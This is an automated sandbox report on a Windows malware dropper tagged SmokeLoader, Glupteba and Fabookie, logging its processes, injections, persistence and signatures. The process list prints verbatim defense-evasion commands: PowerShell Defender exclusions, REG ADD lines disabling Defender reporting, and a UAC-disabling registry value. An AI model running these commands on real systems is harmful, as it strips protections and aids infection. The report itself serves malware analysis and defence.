Malware Analysis Report

2025-01-02 09:18

Sample ID 231007-a9zzzsgf2y
Target 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d
SHA256 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d
Tags
upx fabookie glupteba privateloader smokeloader pub1 backdoor dropper evasion loader spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d

Threat Level: Known bad

The file 127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d was found to be: Known bad.

Malicious Activity Summary

upx fabookie glupteba privateloader smokeloader pub1 backdoor dropper evasion loader spyware stealer themida trojan

SmokeLoader

Glupteba payload

Detect Fabookie payload

Fabookie

Glupteba

UAC bypass

PrivateLoader

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Themida packer

Reads user/profile data of web browsers

Loads dropped DLL

Drops startup file

UPX packed file

Executes dropped EXE

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Checks whether UAC is enabled

Looks up external IP address via web service

Launches sc.exe

Program crash

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

System policy modification

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-07 00:55

Signatures

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-07 00:55

Reported

2023-10-07 00:58

Platform

win10-20230915-en

Max time kernel

10s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe"

Signatures

Detect Fabookie payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

PrivateLoader

loader privateloader

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Stops running service(s)

evasion

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4JX5IZuR1L9zwH8lM5NsXAF.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtCEOMvP5mFMD47nZE0N7Vmd.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jxLP3VuA12vAGCLu0DiQOG1V.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GfStnCSODuMy0zJMXBmb8v3f.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2wa0gK2CD8MipOxEwxVi6YGI.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1sbtjpSxopfFDuC3xikuDgY1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5I4SNp1K6yj1aUrfHxAQmaWf.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kijenzScoOktVerhmynMSqrj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAd2Pict3t7Qd0iSCOzIUvf1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9YYXYifJSN9Di2qLTK2nrMeF.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94pVqUcWIBqnfpKzzpEQvmhv.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | N/A
N/A | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | N/A
File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ipinfo.io | N/A | N/A
N/A | ipinfo.io | N/A | N/A
N/A | api.myip.com | N/A | N/A
N/A | api.myip.com | N/A | N/A

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\system32\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\System32\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 644 wrote to memory of 712 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 644 wrote to memory of 712 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 644 wrote to memory of 4176 | N/A | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4176 wrote to memory of 3656 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 3656 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 3656 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | \??\c:\windows\SysWOW64\reg.exe
PID 4176 wrote to memory of 5112 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 5112 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 5112 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe
PID 4176 wrote to memory of 3988 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 3988 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 3988 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 4176 wrote to memory of 4544 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4544 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4544 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe
PID 4176 wrote to memory of 4068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4068 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe
PID 4176 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe
PID 4176 wrote to memory of 5116 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5116 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5116 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe
PID 4176 wrote to memory of 5084 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe
PID 4176 wrote to memory of 5084 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe
PID 4176 wrote to memory of 4492 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe
PID 4176 wrote to memory of 4492 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe
PID 3988 wrote to memory of 4140 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 4140 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 4140 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 5112 wrote to memory of 3400 | N/A | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe | C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 5112 wrote to memory of 3400 | N/A | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe | C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 5112 wrote to memory of 3400 | N/A | C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe | C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp
PID 4516 wrote to memory of 2840 | N/A | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe | C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 4516 wrote to memory of 2840 | N/A | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe | C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 4516 wrote to memory of 2840 | N/A | C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe | C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp
PID 3988 wrote to memory of 3964 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 3964 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe
PID 3988 wrote to memory of 3964 | N/A | C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe | C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe

System policy modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe

"C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\127e5531f968cd67deecb3855f48b7fc5624ddf30573934426980f99ac549a0d.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

"C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe"

C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe

"C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe

"C:\Users\Admin\Pictures\BGFqRnDmzqygvUEXV8ibxwCU.exe"

C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe

"C:\Users\Admin\Pictures\cVQuTwlBIqJuiJxb3lrvqGNO.exe"

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe" --silent --allusers=0

C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe

"C:\Users\Admin\Pictures\G2SZjKRUDxH7UjI0BHOtmDzT.exe"

C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe

"C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe"

C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe

"C:\Users\Admin\Pictures\VI9xk37vZ1hPxGyqkplQbk0H.exe"

C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe

"C:\Users\Admin\Pictures\Iq5uaZWhDgUZkcNbrHwhNpCq.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xf08sdlOA2OHz3IrTpI6lnjC.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\AppData\Local\Temp\7zSE177.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe

"C:\Users\Admin\Pictures\AqX1vDOyZ5AE2GpB6E1KGAyf.exe"

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d8a8538,0x6d8a8548,0x6d8a8554

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

"C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3988 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231007005546" --session-guid=2d03b50d-c35d-4ba8-81ee-05d524f5afc1 --server-tracking-blob=... --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=7C04000000000000

C:\Users\Admin\AppData\Local\Temp\is-52LKL.tmp\_isetup\_setup64.tmp

helper 105 0x3B8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe

"C:\Users\Admin\Pictures\XPGL2Iq2vXRS7Z16Fr3fh9L6.exe"

C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q1HIR.tmp\c0is4o4zfXbtR2aLKnJyUN55.tmp" /SL5="$80216,5025136,832512,C:\Users\Admin\Pictures\c0is4o4zfXbtR2aLKnJyUN55.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp

"C:\Users\Admin\AppData\Local\Temp\is-1VM64.tmp\is-0V4KQ.tmp" /SL4 $A0072 "C:\Users\Admin\Pictures\2aXfqNJBJo56ogxVyBC1cEvr.exe" 2846236 52224

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe

C:\Users\Admin\Pictures\xf08sdlOA2OHz3IrTpI6lnjC.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f688538,0x6f688548,0x6f688554

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe

"C:\Users\Admin\Pictures\GX7zBMt5qEP7mvHo7sUjQ8oD.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\cmd.exe

